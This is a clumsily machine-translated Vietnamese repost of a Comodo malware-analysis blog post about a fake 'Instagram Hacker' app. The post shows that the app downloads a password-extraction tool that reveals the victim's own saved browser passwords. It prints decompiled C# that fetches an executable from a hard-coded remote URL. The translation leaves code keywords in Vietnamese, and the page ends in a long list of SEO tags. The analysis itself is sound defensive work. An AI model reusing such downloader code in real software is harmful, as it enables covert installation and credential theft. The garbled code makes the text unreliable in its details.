Thời gian đọc: 4 phút
Nhiều người không coi Ứng dụng tiềm ẩn không mong muốn (PUA) là mối nguy hiểm nghiêm trọng. Lý do cho thái độ liều lĩnh như vậy là do PUA thường được cài đặt với sự đồng ý của người dùng. Nhưng ý kiến này là một sai lầm lớn. Và không chỉ bởi vì PUA có thể lén lút cài đặt các chương trình khác như phần mềm quảng cáo hoặc phần mềm gián điệp trên cơ sở tải xuống từng ổ đĩa. Ví dụ sinh động dưới đây được phân tích bởi Phòng thí nghiệm nghiên cứu về mối đe dọa của Comodo các chuyên gia chứng minh rõ ràng rằng PUA có thể là một vũ khí đe dọa hơn nhiều.
Gặp gỡ phần mềm có tên “Instagram Hacker”. Nó có trang web chính thức https://hackinstagram.net/ và hứa hẹn… hack bất kỳ tài khoản Instagram nào. Hơn thế nữa, bạn có thể tải xuống và cài đặt miễn phí.
Sau khi cài đặt, nó sẽ nhắc nhập URL hồ sơ Instagram và hack mật khẩu.
Kết quả sẽ có sau vài giây:
Nhưng sau khi nhấp vào nút “Xem mật khẩu”, một cửa sổ mới xuất hiện:
Nhấp vào nút “Lấy mã kích hoạt” sẽ chuyển hướng đến “Trang mua”.
Nó đề nghị mua “Mã kích hoạt” nhưng… bạn có thể ngửi thấy có gian lận trong không khí không? Rõ ràng là không có phần mềm nào có thể phá mật khẩu Instagram trong vài giây có thể tồn tại. Vậy có phải Instagram Hacker chỉ là một công cụ lừa gạt khác để đánh lừa đơn giản hay không? Cách tốt nhất để kiểm tra là xem bên trong mã ứng dụng.
Mã được bảo vệ bằng Dotnet Reactor nhưng có thể được giải mã bằng công cụ de4dot.
Và bây giờ chúng ta có thể thấy chắc chắn ứng dụng là một công cụ lừa đảo. Đoạn mã đầu tiên chỉ giả mạo chỉ báo trình diễn tiến trình.
Nhưng một cái khác thú vị hơn. Như bạn có thể thấy, nó chứa một URL với tệp thực thi để tải xuống nếu kích hoạt thành công.
LoadingWindow ()
{
Class2.qDiUy7EzyuIMj ();
this.filename = “view.exe”;
this.uri = new Uri (“http://software-logistics.net/external/component/download/view.exe”);
this.InitializeComponent ();
if (File.Exists (this.filename))
{
File.Delete (this.filename);
}
thử
{
WebClient client1 = new WebClient ();
client1.DownloadFileAsync (this.uri, this.filename);
client1.DownloadProgressChanged + = new DownloadProgressChangedEventHandler (this.method_1);
client1.DownloadFileCompleted + = new AsyncCompletedEventHandler (this.method_2);
}
bắt
{
this.method_0 ();
}
}
}
}
Nếu chúng tôi chạy tệp thực thi, chúng tôi sẽ phát hiện ra rằng đó là ứng dụng WebBrowserPassView từ NirSoft:
https://www.nirsoft.net/utils/web_browser_password.html
WebBrowserPassView chỉ là một công cụ trích xuất mật khẩu để tiết lộ các mật khẩu được lưu trữ bởi các trình duyệt web. Vì vậy, tất cả mật khẩu mà phần mềm này có thể trích xuất không phải của Instagram mà là mật khẩu của chính người dùng được lưu trong trình duyệt của họ!
Hãy tiếp tục: tất cả những gì Instagram Hacker làm là tải xuống và khởi chạy một PUA khác từ NirSoft. Vì vậy, chúng ta rõ ràng phải đối mặt với một công cụ gian lận. Lưu ý thủ thuật tâm lý lôi kéo ở đây: nếu nạn nhân phát hiện ra mình bị lừa, cô ấy hầu như không báo cảnh sát về vụ việc. Bởi vì trong trường hợp đó, cô ấy sẽ phải thú nhận khi cố gắng hack Instagram, đó là một hành động phạm tội mạng.
Nhưng đó là một phần cuối mỏng của cạnh.
Mối đe dọa nguy hiểm nhất là URL trong ứng dụng có thể dễ dàng bị thay đổi trên bất kỳ URL nào khác với một tệp độc hại sẽ được thực thi trên máy của nạn nhân. Vì vậy, PUA này - cũng như nhiều ví dụ khác về loại phần mềm độc hại như vậy - có thể được sử dụng để gia tăng mạnh mẽ các phần mềm độc hại “nặng” khác nhau như trojan, backdoor, ransomware và vv
Và đây là lý do chính đáng để coi PUA là phần mềm độc hại thực sự nguy hiểm. Bởi vì nó có thể trở thành bàn đạp cho một cuộc tấn công mạng lớn có sức tàn phá lớn.
“Hôm nay chúng ta không nên xem xét phần mềm độc hại Fatih Orhan, Trưởng phòng thí nghiệm nghiên cứu về mối đe dọa của Comodo, cho biết. "Không tí nào phần mềm độc hại không tồn tại trong một không gian biệt lập. Ngày nay tội phạm mạng xây dựng các chuỗi phần mềm độc hại dài để tấn công người dùng và như bạn thấy, PUA có thể là một mắt xích trong một chuỗi giết người như vậy. Vì vậy, chúng ta nên gọi thuổng là thuổng. Có, các ứng dụng này được tải xuống và chạy với sự chấp thuận của người dùng, nhưng như trong trường hợp này, việc phê duyệt bị lừa đảo. Trong suốt các ứng dụng không mong muốn tiềm ẩn giả vờ là hợp pháp, mọi người cần hiểu đó chỉ là một sự ngụy trang. Đó là lý do tại sao Comodo không chỉ cung cấp các biện pháp bảo vệ kỹ thuật cao cấp mà còn thường xuyên thông báo cho người dùng để họ tránh khỏi những cái bẫy nguy hiểm trên không gian mạng ”.
Sống an toàn với Comodo!
Tài nguyên liên quan
Tấn công DDOS Wikipedia
Xóa Malware
Trình quét phần mềm độc hại trang web
Bảo mật trang web tốt nhất
WordPress an ninh
BẮT ĐẦU DÙNG THỬ MIỄN PHÍ NHẬN MIỄN PHÍ SCORECARD NGAY LẬP TỨC
- Phân phối nội dung và PR được hỗ trợ bởi SEO. Được khuếch đại ngay hôm nay.
- Platoblockchain. Web3 Metaverse Intelligence. Khuếch đại kiến thức. Truy cập Tại đây.
- nguồn: https://blog.comodo.com/comodo-news/how-unwanted-applications-are-greater-security-threat/
- a
- Có khả năng
- Giới thiệu
- Tài khoản
- Hành động
- kích hoạt
- Sau
- KHÔNG KHÍ
- Tất cả
- và
- Một
- Các Ứng Dụng
- các ứng dụng
- phê duyệt
- tấn công
- Thái độ
- Backdoors
- cơ sở
- bởi vì
- BEST
- lớn
- Blog
- Nghỉ giải lao
- trình duyệt
- xây dựng
- nút
- mua
- cuộc gọi
- trường hợp
- chuỗi
- chuỗi
- kiểm tra
- Rõ ràng
- mã
- cam kết
- đồng ý
- Hãy xem xét
- chứa
- Tấn công mạng
- tội phạm mạng
- tội phạm mạng
- NGUY HIỂM
- Nguy hiểm
- DDoS
- tàn phá
- Khám phá
- dont
- tăng gấp đôi
- tải về
- dễ dàng
- Cạnh
- đăng ký hạng mục thi
- vv
- Sự kiện
- ví dụ
- ví dụ
- các chuyên gia
- trích xuất
- Đối mặt
- vài
- Tập tin
- Tìm kiếm
- Tên
- gian lận
- Miễn phí
- từ
- được
- tốt
- lớn hơn
- tấn
- của hacker
- cái đầu
- tại đây
- Độ đáng tin của
- Hướng dẫn
- HTML
- HTTPS
- in
- sự cố
- chỉ số
- cài đặt, dựng lên
- ngay lập tức
- thú vị
- bị cô lập
- IT
- Phòng thí nghiệm
- ra mắt
- LINK
- dài
- Xem
- máy
- phần mềm độc hại
- Tấn công phần mềm độc hại
- nhiều
- lớn
- max-width
- sai lầm
- chi tiết
- hầu hết
- Được đặt theo tên
- nhu cầu
- Mới
- Rõ ràng
- Cung cấp
- chính thức
- Trang web chinh thưc
- ONE
- Ý kiến
- Nền tảng khác
- riêng
- Mật khẩu
- Mật khẩu
- người
- PHP
- plato
- Thông tin dữ liệu Plato
- PlatoDữ liệu
- Công an
- có khả năng
- ngăn chặn
- Hồ sơ
- Khóa Học
- Tiến độ
- Hứa hẹn
- bảo vệ
- bảo vệ
- cho
- nhận ra
- lý do
- liều lĩnh
- thường xuyên
- Báo cáo
- nghiên cứu
- kết quả
- tiếp tục
- Tiết lộ
- Thoát khỏi
- chạy
- phiếu ghi điểm
- giây
- an toàn
- an ninh
- nghiêm trọng
- nên
- So
- Phần mềm
- Không gian
- phần mềm gián điệp
- lưu trữ
- thành công
- như vậy
- Hãy
- Kỹ thuật
- Sản phẩm
- cung cấp their dịch
- mối đe dọa
- khắp
- thời gian
- đến
- công cụ
- bẫy
- XOAY
- hiểu
- không mong muốn
- URL
- người sử dang
- Người sử dụng
- thường
- khác nhau
- nạn nhân
- Xem
- web
- Trình duyệt web
- Website
- sẽ
- sẽ
- Bạn
- trên màn hình
- zephyrnet